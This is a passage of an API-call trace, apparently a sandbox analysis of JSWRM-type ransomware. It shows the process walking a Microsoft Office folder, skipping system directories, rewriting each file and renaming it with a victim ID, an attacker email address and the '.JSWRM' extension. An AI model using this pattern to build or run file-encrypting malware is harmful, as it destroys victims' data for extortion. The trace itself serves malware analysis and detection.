Size=0x20) returned 0x240f70 [0122.572] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WDERRLNK.VRD", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0122.572] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WDERRLNK.VRD", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WDERRLNK.VRD", lpUsedDefaultChar=0x0) returned 12 [0122.572] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0122.572] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0122.572] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0122.572] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0122.572] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0122.572] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0122.572] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\WDERRLNK.VRD" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\wderrlnk.vrd"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0122.573] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1826) returned 1 [0122.573] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.573] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x720) returned 0x20c6c0 [0122.573] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x720, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x720, lpOverlapped=0x0) returned 1 [0122.575] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.575] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x720, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x720, lpOverlapped=0x0) returned 1 [0122.575] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20c6c0 | out: hHeap=0x1e0000) returned 1 [0122.575] CloseHandle (hObject=0x238) returned 1 [0122.575] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0122.575] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0122.575] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0122.575] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0122.575] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0122.575] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0122.575] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0122.575] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0122.575] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0122.575] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0122.575] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0122.575] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0122.575] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0122.575] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0122.575] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0122.575] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0122.575] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\WDERRLNK.VRD" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\wderrlnk.vrd"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\WDERRLNK.VRD.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\wderrlnk.vrd.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0122.576] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0122.576] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0122.576] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0122.576] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x3b580a61, ftCreationTime.dwHighDateTime=0x1d47c34, ftLastAccessTime.dwLowDateTime=0x3b580a61, ftLastAccessTime.dwHighDateTime=0x1d47c34, ftLastWriteTime.dwLowDateTime=0x3b93a5c4, ftLastWriteTime.dwHighDateTime=0x1d47c34, nFileSizeHigh=0x0, nFileSizeLow=0x5eeb8, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="WINPROJ.HXS", cAlternateFileName="")) returned 1 [0122.576] lstrcmpiW (lpString1="WINPROJ.HXS", lpString2=".") returned 1 [0122.576] lstrcmpiW (lpString1="WINPROJ.HXS", lpString2="..") returned 1 [0122.576] lstrcmpiW (lpString1="WINPROJ.HXS", lpString2="...") returned 1 [0122.576] lstrcmpiW (lpString1="WINPROJ.HXS", lpString2="windows") returned 1 [0122.576] lstrcmpiW (lpString1="WINPROJ.HXS", lpString2="recovery") returned 1 [0122.576] lstrcmpiW (lpString1="WINPROJ.HXS", lpString2="perflogs") returned 1 [0122.576] lstrcmpiW (lpString1="WINPROJ.HXS", lpString2="documents and settings") returned 1 [0122.576] lstrcmpiW (lpString1="WINPROJ.HXS", lpString2="$RECYCLE.BIN") returned 1 [0122.577] lstrcmpiW (lpString1="WINPROJ.HXS", lpString2="system volume information") returned 1 [0122.577] lstrcmpiW (lpString1="WINPROJ.HXS", lpString2="msocache") returned 1 [0122.577] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0122.577] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WINPROJ.HXS", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0122.577] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WINPROJ.HXS", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WINPROJ.HXS", lpUsedDefaultChar=0x0) returned 11 [0122.577] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0122.577] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0122.577] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WINPROJ.HXS", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0122.577] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WINPROJ.HXS", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WINPROJ.HXS", lpUsedDefaultChar=0x0) returned 11 [0122.577] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0122.577] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0122.577] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0122.577] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0122.577] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0122.577] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0122.577] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\WINPROJ.HXS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\winproj.hxs"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0122.578] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=388792) returned 1 [0122.578] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.578] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1d8 [0122.578] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0122.592] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.592] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0122.592] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0122.593] CloseHandle (hObject=0x238) returned 1 [0122.593] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0122.593] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0122.593] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0122.593] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0122.593] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0122.593] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0122.593] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0122.593] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0122.593] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0122.593] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0122.593] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0122.593] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0122.593] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0122.593] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0122.593] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0122.594] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0122.594] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\WINPROJ.HXS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\winproj.hxs"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\WINPROJ.HXS.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\winproj.hxs.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0122.595] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0122.595] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0122.595] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0122.595] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x3b93a5c4, ftCreationTime.dwHighDateTime=0x1d47c34, ftLastAccessTime.dwLowDateTime=0x3b93a5c4, ftLastAccessTime.dwHighDateTime=0x1d47c34, ftLastWriteTime.dwLowDateTime=0x3b93a5c4, ftLastWriteTime.dwHighDateTime=0x1d47c34, nFileSizeHigh=0x0, nFileSizeLow=0x281, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="WINPROJ_COL.HXC", cAlternateFileName="WINPRO~2.HXC")) returned 1 [0122.595] lstrcmpiW (lpString1="WINPROJ_COL.HXC", lpString2=".") returned 1 [0122.595] lstrcmpiW (lpString1="WINPROJ_COL.HXC", lpString2="..") returned 1 [0122.595] lstrcmpiW (lpString1="WINPROJ_COL.HXC", lpString2="...") returned 1 [0122.595] lstrcmpiW (lpString1="WINPROJ_COL.HXC", lpString2="windows") returned 1 [0122.595] lstrcmpiW (lpString1="WINPROJ_COL.HXC", lpString2="recovery") returned 1 [0122.595] lstrcmpiW (lpString1="WINPROJ_COL.HXC", lpString2="perflogs") returned 1 [0122.595] lstrcmpiW (lpString1="WINPROJ_COL.HXC", lpString2="documents and settings") returned 1 [0122.595] lstrcmpiW (lpString1="WINPROJ_COL.HXC", lpString2="$RECYCLE.BIN") returned 1 [0122.595] lstrcmpiW (lpString1="WINPROJ_COL.HXC", lpString2="system volume information") returned 1 [0122.595] lstrcmpiW (lpString1="WINPROJ_COL.HXC", lpString2="msocache") returned 1 [0122.595] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0122.595] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WINPROJ_COL.HXC", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0122.595] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WINPROJ_COL.HXC", cchWideChar=15, lpMultiByteStr=0x345ebd8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WINPROJ_COL.HXC", lpUsedDefaultChar=0x0) returned 15 [0122.595] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0122.595] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0122.595] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WINPROJ_COL.HXC", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0122.595] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WINPROJ_COL.HXC", cchWideChar=15, lpMultiByteStr=0x345eba8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WINPROJ_COL.HXC", lpUsedDefaultChar=0x0) returned 15 [0122.595] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0122.595] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0122.595] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0122.595] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0122.595] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0122.595] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0122.595] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\WINPROJ_COL.HXC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\winproj_col.hxc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0122.596] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=641) returned 1 [0122.596] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.596] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x280) returned 0x20b1f8 [0122.596] ReadFile (in: hFile=0x238, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x280, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesRead=0x345e89c*=0x280, lpOverlapped=0x0) returned 1 [0122.625] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.625] WriteFile (in: hFile=0x238, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x280, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345e898*=0x280, lpOverlapped=0x0) returned 1 [0122.626] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20b1f8 | out: hHeap=0x1e0000) returned 1 [0122.626] CloseHandle (hObject=0x238) returned 1 [0122.626] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0122.626] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0122.626] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0122.626] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0122.626] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0122.626] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0122.626] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0122.626] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0122.626] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0122.626] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0122.626] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0122.626] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0122.626] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0122.626] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0122.626] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\WINPROJ_COL.HXC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\winproj_col.hxc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\WINPROJ_COL.HXC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\winproj_col.hxc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0122.628] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0122.628] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0122.628] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0122.628] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x3b93a5c4, ftCreationTime.dwHighDateTime=0x1d47c34, ftLastAccessTime.dwLowDateTime=0x3b93a5c4, ftLastAccessTime.dwHighDateTime=0x1d47c34, ftLastWriteTime.dwLowDateTime=0x3b93a5c4, ftLastWriteTime.dwHighDateTime=0x1d47c34, nFileSizeHigh=0x0, nFileSizeLow=0xcf, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="WINPROJ_COL.HXT", cAlternateFileName="WINPRO~1.HXT")) returned 1 [0122.628] lstrcmpiW (lpString1="WINPROJ_COL.HXT", lpString2=".") returned 1 [0122.628] lstrcmpiW (lpString1="WINPROJ_COL.HXT", lpString2="..") returned 1 [0122.628] lstrcmpiW (lpString1="WINPROJ_COL.HXT", lpString2="...") returned 1 [0122.628] lstrcmpiW (lpString1="WINPROJ_COL.HXT", lpString2="windows") returned 1 [0122.628] lstrcmpiW (lpString1="WINPROJ_COL.HXT", lpString2="recovery") returned 1 [0122.628] lstrcmpiW (lpString1="WINPROJ_COL.HXT", lpString2="perflogs") returned 1 [0122.628] lstrcmpiW (lpString1="WINPROJ_COL.HXT", lpString2="documents and settings") returned 1 [0122.628] lstrcmpiW (lpString1="WINPROJ_COL.HXT", lpString2="$RECYCLE.BIN") returned 1 [0122.628] lstrcmpiW (lpString1="WINPROJ_COL.HXT", lpString2="system volume information") returned 1 [0122.628] lstrcmpiW (lpString1="WINPROJ_COL.HXT", lpString2="msocache") returned 1 [0122.628] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0122.628] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WINPROJ_COL.HXT", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0122.628] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WINPROJ_COL.HXT", cchWideChar=15, lpMultiByteStr=0x345ebd8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WINPROJ_COL.HXT", lpUsedDefaultChar=0x0) returned 15 [0122.628] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0122.628] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0122.628] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WINPROJ_COL.HXT", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0122.628] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WINPROJ_COL.HXT", cchWideChar=15, lpMultiByteStr=0x345eba8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WINPROJ_COL.HXT", lpUsedDefaultChar=0x0) returned 15 [0122.628] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0122.628] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2106b0 [0122.628] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0122.628] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0122.628] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 